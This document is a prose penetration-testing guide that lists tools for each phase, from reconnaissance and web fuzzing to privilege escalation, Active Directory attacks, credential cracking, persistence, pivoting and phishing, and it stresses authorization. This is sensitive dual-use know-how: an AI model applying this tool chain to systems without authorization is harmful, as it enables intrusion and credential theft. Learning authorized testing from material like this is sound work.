Comprehensive Penetration Testing Guide

Before any testing begins, it’s helpful to establish clear rules of engagement through pre-engagement activities. Consider defining the scope, objectives, timeline, and legal boundaries, documenting everything in a formal agreement to protect both parties. Resources like PTES (Penetration Testing Execution Standard) and the OWASP Testing Guide can provide useful frameworks for structuring this phase.

Reconnaissance forms the foundation of many penetration tests, involving tools that help with everything from identifying devices on a network to discovering open ports on targeted servers. Common tools include Nmap for network discovery and security auditing, Wireshark for network protocol analysis, Masscan as a fast port scanner, and Rustscan as a modern alternative. For automated reconnaissance workflows, AutoRecon offers multi-threaded network reconnaissance, while nmapAutomator and Reconnoitre provide additional automation capabilities.

Attacking wireless network interface cards (WNIC) takes advantage of omnidirectional radio-waves transmitted through QAM and OFDM protocols. Aircrack-ng, an injector and frame replay tool, performs cryptoanalysis to recover WEP and WPA/WPA2-Pre-Shared Key (PSK) keys using various techniques. Additional wireless tools include Wifite for automated wireless attacks, Kismet as a wireless network detector and sniffer, and Fern WiFi Cracker providing a GUI-based approach to wireless security auditing.

OSINT (Open Source Intelligence) involves gathering publicly available information about targets through tools like theHarvester for email, subdomain, and name harvesting, Shodan as a search engine for Internet-connected devices, Maltego for data mining and intelligence gathering, Recon-ng as a web reconnaissance framework, SpiderFoot for automated OSINT collection, and FOCA for metadata analysis. Domain and DNS enumeration can be performed using Sublist3r for subdomain enumeration, Amass for in-depth DNS enumeration, DNSRecon for DNS reconnaissance, Subfinder for passive subdomain discovery, and Assetfinder to find domains and subdomains.

When it comes to HTTP there’s many paths that can be taken, pentestbook is a link often used to aid discovery. Directory and content discovery through crawl and fuzz tools helps uncover hidden files, directories, and endpoints. ffuf serves as a fast web fuzzer that many find effective, while Gobuster provides directory, file, and DNS busting capabilities. Dirbuster offers multi-threaded directory brute-forcing, Feroxbuster enables fast recursive content discovery, and wfuzz acts as a comprehensive web application fuzzer. These tools work well when paired with quality wordlists from SecLists, which provides collections of multiple list types for security assessments, and FuzzDB containing attack patterns and predictable resource locations.

Web crawling and spidering can utilize tools like Burp Suite as an integrated platform for web application security testing, OWASP ZAP as a web application security scanner, Hakrawler as a fast web crawler, Katana as a next-generation crawling framework, and GoSpider for fast web spidering. For specific vulnerability testing, SQLmap automates SQL injection exploitation, XSStrike provides advanced XSS detection, Commix handles command injection exploitation, NoSQLMap tests for NoSQL injection vulnerabilities, and Dalfox offers fast XSS scanning capabilities.

API testing can benefit from specialized approaches using tools like Postman as an API testing platform, Arjun for HTTP parameter discovery, FFUF which can be adapted for API fuzzing, and Kiterunner for API endpoint discovery. For CMS-specific testing, WPScan scans WordPress installations, Joomscan targets Joomla vulnerabilities, and Droopescan handles Drupal and Silverstripe scanning.

Exploitation frameworks provide comprehensive platforms for attacking systems, with Metasploit Framework being a widely-used exploitation framework, Empire offering post-exploitation capabilities, Covenant as a .NET command and control framework, and Sliver providing a modern C2 framework. Payload generation can utilize msfvenom as part of Metasploit, Shellter for dynamic shellcode injection, and Veil as a payload generator designed for bypassing antivirus. Manual exploitation resources include Exploit-DB as an archive of public exploits, GTFOBins documenting Unix binaries that can bypass security restrictions, LOLBAS covering Living Off The Land Binaries and Scripts for Windows, HackTricks providing comprehensive penetration testing techniques, and PayloadsAllTheThings offering useful payloads and bypasses.

Post-exploitation activities often begin with establishing file transfer capabilities. Now that it’s setup, the http.server can share files through socketserver.TCPserver as a localhost:80 . I’ll be sharing my priv esc tools which for this example i’ll use linpeas with linenum as a backup. File transfer methods include running Python’s built-in HTTP server using python3 -m http.server 80, Updog as an improved Python HTTP server with upload capability, Impacket’s smbserver for quick SMB servers, Certutil as a Windows built-in file download utility, and various PowerShell download cradles for alternative download methods.

For Linux privilege escalation, additional tools worth considering include Linux Smart Enumeration (LSE) for detailed enumeration, Linux Exploit Suggester to suggest kernel exploits, and pspy to monitor Linux processes without root permissions. Resources like GTFOBins provide Unix binary exploitation references, while HackTricks Linux PrivEsc offers comprehensive privilege escalation techniques.

Windows privilege escalation can employ WinPEAS as the Windows equivalent privilege escalation script, PowerUp as a PowerShell privilege escalation framework, Seatbelt for C# security-oriented enumeration, Watson for Windows vulnerability enumeration, Windows Exploit Suggester to suggest exploits based on patch levels, and PrivescCheck for PowerShell privilege escalation enumeration. Windows-specific resources include LOLBAS for Living Off The Land techniques and HackTricks Windows PrivEsc for detailed Windows privilege escalation methodologies.

Active Directory enumeration and exploitation can benefit from specialized tools like BloodHound for AD relationship mapping and attack path analysis, SharpHound as BloodHound’s data collector, PowerView for PowerShell AD enumeration, Rubeus as a Kerberos abuse toolkit, Impacket providing Python classes for network protocols, CrackMapExec as a versatile tool for pentesting networks, Kerbrute for Kerberos username enumeration, and Mimikatz for credential extraction. AD-specific resources include WADComs as an interactive cheat sheet for Windows and AD, Active Directory Exploitation Cheat Sheet, and HackTricks AD Methodology.

Credential harvesting and cracking can utilize Mimikatz for Windows credential extraction, LaZagne for multi-platform credential recovery, John the Ripper as a versatile password cracker, Hashcat for advanced password recovery, Hydra as a network logon cracker, Medusa for fast parallel password cracking, and CrackStation for online hash lookups. Password lists for these tools include the well-known RockYou list, CrackStation Wordlist as a massive compilation, and Weakpass providing collections of password lists.

Persistence mechanisms can be established using Empire Persistence Modules offering various persistence techniques, PowerSploit Persistence providing PowerShell-based methods, and SharPersist as a Windows persistence toolkit. Pivoting and tunneling enable lateral movement through Chisel as a fast TCP/UDP tunnel over HTTP, Ligolo-ng as a simple lightweight tunneling tool, sshuttle creating VPN over SSH, Proxychains forcing connections through proxy servers, and Metasploit Pivoting with built-in capabilities.

Password attacks split into online and offline categories, with online attacks using Hydra for network logon cracking, Medusa as a speedy parallel password cracker, Patator as a multi-purpose brute-forcer, and Ncrack for high-speed network authentication cracking. Offline password attacks can leverage John the Ripper for general password cracking, Hashcat for advanced password recovery, and Ophcrack specifically for Windows password cracking using rainbow tables.

Social engineering testing can employ phishing frameworks like Gophish as an open-source phishing framework, SET (Social Engineering Toolkit) for comprehensive social engineering testing, King Phisher as a phishing campaign toolkit, and Evilginx2 as a MitM attack framework for phishing credentials.

Reporting and documentation can benefit from tools like Dradis as a collaboration and reporting platform, Serpico for penetration testing report generation, Pwndoc as a pentest reporting application, and Ghostwriter for collaborative report writing and project management. Screenshot and evidence collection can utilize Flameshot as a powerful screenshot tool, Greenshot for Windows screenshots, and Scrot as a command-line screenshot utility.

A typical penetration test might follow with pre-engagement for scoping, contracts, and rules of engagement, moving to reconnaissance for passive and active information gathering, progressing to enumeration searching discovered services and systems, finding vulnerabilies searching databases for potential weaknesses, exploitation to gain initial access, expanding through post-exploitation with privilege escalation, lateral movement, and persistence, and concluding with reporting the entire process. Obtain proper authorization before testing any systems you don’t own, unauthorized access hold legal consequences regardless of intent or methodology used.